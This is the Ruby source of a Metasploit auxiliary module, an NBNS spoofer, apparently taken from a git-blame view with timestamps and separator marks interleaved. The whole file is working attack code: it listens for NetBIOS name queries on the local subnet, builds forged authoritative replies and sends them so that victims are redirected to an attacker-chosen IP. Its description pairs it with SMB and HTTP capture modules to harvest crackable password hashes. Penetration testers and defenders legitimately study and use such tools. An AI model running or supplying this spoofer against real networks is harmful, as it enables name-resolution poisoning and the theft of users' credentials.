2011-03-31 22:22:13 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-03-31 22:22:13 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Capture
|
|
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
|
super(
|
|
|
|
|
'Name' => 'NetBIOS Name Service Spoofer',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests
|
|
|
|
|
sent to the local subnet's broadcast address and spoof a response, redirecting the querying
|
|
|
|
|
machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or
|
|
|
|
|
capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on
|
|
|
|
|
common networks.
|
|
|
|
|
|
|
|
|
|
This module must be run as root and will bind to udp/137 on all interfaces.
|
|
|
|
|
},
|
|
|
|
|
'Author' => [ 'Tim Medin <tim[at]securitywhole.com>' ],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'URL', 'http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html' ]
|
|
|
|
|
],
|
|
|
|
|
'Actions' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'Service' ]
|
|
|
|
|
],
|
|
|
|
|
'PassiveActions' =>
|
|
|
|
|
[
|
|
|
|
|
'Service'
|
|
|
|
|
],
|
|
|
|
|
'DefaultAction' => 'Service'
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
register_options([
|
|
|
|
|
OptAddress.new('SPOOFIP', [ true, "IP address with which to poison responses", "127.0.0.1"]),
|
|
|
|
|
OptString.new('REGEX', [ true, "Regex applied to the NB Name to determine if spoofed reply is sent", '.*']),
|
|
|
|
|
])
|
|
|
|
|
|
|
|
|
|
register_advanced_options([
|
|
|
|
|
OptBool.new('Debug', [ false, "Determines whether incoming packet parsing is displayed", false])
|
|
|
|
|
])
|
|
|
|
|
|
|
|
|
|
deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
|
check_pcaprub_loaded() # Check first since otherwise this is all for naught
|
|
|
|
|
# MacOS X workaround
|
|
|
|
|
::Socket.do_not_reverse_lookup = true
|
|
|
|
|
|
|
|
|
|
@sock = ::UDPSocket.new()
|
|
|
|
|
@sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
|
|
|
|
|
@sock.bind('', 137) # couldn't specify srv host because it missed broadcasts
|
|
|
|
|
|
|
|
|
|
@run = true
|
|
|
|
|
|
|
|
|
|
print_status("NBNS Spoofer started. Listening for NBNS requests...")
|
|
|
|
|
|
|
|
|
|
begin
|
|
|
|
|
|
|
|
|
|
while @run # Not exactly thrilled we can never turn this off XXX fix this sometime.
|
|
|
|
|
packet, addr = @sock.recvfrom(512)
|
|
|
|
|
rhost = addr[3]
|
2013-10-04 16:58:21 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
break if packet.length == 0
|
|
|
|
|
|
|
|
|
|
nbnsq_transid = packet[0..1]
|
|
|
|
|
nbnsq_flags = packet[2..3]
|
|
|
|
|
nbnsq_questions = packet[4..5]
|
|
|
|
|
nbnsq_answerrr = packet[6..7]
|
|
|
|
|
nbnsq_authorityrr = packet[8..9]
|
|
|
|
|
nbnsq_additionalrr = packet[10..11]
|
|
|
|
|
nbnsq_name = packet[12..45]
|
|
|
|
|
decoded = ""
|
|
|
|
|
nbnsq_name.slice(1..-2).each_byte do |c|
|
|
|
|
|
decoded << "#{(c - 65).to_s(16)}"
|
|
|
|
|
end
|
|
|
|
|
nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
|
|
|
|
|
nbnsq_type = packet[46..47]
|
|
|
|
|
nbnsq_class = packet[48..49]
|
|
|
|
|
|
|
|
|
|
if (nbnsq_decodedname =~ /#{datastore['REGEX']}/i)
|
|
|
|
|
|
2013-10-04 16:58:21 +00:00
|
|
|
vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{datastore["SPOOFIP"]}")
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
|
if datastore['DEBUG']
|
|
|
|
|
print_status("transid: #{nbnsq_transid.unpack('H4')}")
|
|
|
|
|
print_status("tlags: #{nbnsq_flags.unpack('B16')}")
|
|
|
|
|
print_status("questions: #{nbnsq_questions.unpack('n')}")
|
|
|
|
|
print_status("answerrr: #{nbnsq_answerrr.unpack('n')}")
|
|
|
|
|
print_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")
|
|
|
|
|
print_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")
|
|
|
|
|
print_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
|
|
|
|
|
print_status("full name: #{nbnsq_name.slice(1..-2)}")
|
|
|
|
|
print_status("decoded: #{decoded}")
|
|
|
|
|
print_status("decoded name: #{nbnsq_decodedname}")
|
|
|
|
|
print_status("type: #{nbnsq_type.unpack('n')}")
|
|
|
|
|
print_status("class: #{nbnsq_class.unpack('n')}")
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# time to build a response packet - Oh YEAH!
|
|
|
|
|
response = nbnsq_transid +
|
|
|
|
|
"\x85\x00" + # Flags = response + authoratative + recursion desired +
|
|
|
|
|
"\x00\x00" + # Questions = 0
|
|
|
|
|
"\x00\x01" + # Answer RRs = 1
|
|
|
|
|
"\x00\x00" + # Authority RRs = 0
|
|
|
|
|
"\x00\x00" + # Additional RRs = 0
|
|
|
|
|
nbnsq_name + # original query name
|
|
|
|
|
nbnsq_type + # Type = NB ...whatever that means
|
|
|
|
|
nbnsq_class+ # Class = IN
|
|
|
|
|
"\x00\x04\x93\xe0" + # TTL = a long ass time
|
|
|
|
|
"\x00\x06" + # Datalength = 6
|
|
|
|
|
"\x00\x00" + # Flags B-node, unique = whet ever that means
|
|
|
|
|
datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
|
|
|
|
|
|
|
|
|
|
open_pcap
|
|
|
|
|
|
|
|
|
|
p = PacketFu::UDPPacket.new
|
|
|
|
|
p.ip_saddr = Rex::Socket.source_address(rhost)
|
|
|
|
|
p.ip_daddr = rhost
|
|
|
|
|
p.ip_ttl = 255
|
|
|
|
|
p.udp_sport = 137
|
|
|
|
|
p.udp_dport = 137
|
|
|
|
|
p.payload = response
|
|
|
|
|
p.recalc
|
|
|
|
|
|
|
|
|
|
capture_sendto(p, rhost)
|
|
|
|
|
|
|
|
|
|
close_pcap
|
|
|
|
|
|
|
|
|
|
else
|
2013-10-04 16:58:21 +00:00
|
|
|
vprint_status("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} did not match regex")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("nbnspoof: #{e.class} #{e} #{e.backtrace}")
|
|
|
|
|
# Make sure the socket gets closed on exit
|
|
|
|
|
ensure
|
|
|
|
|
@sock.close
|
|
|
|
|
end
|
|
|
|
|
end
|
2011-03-31 22:22:13 +00:00
|
|
|
end
|
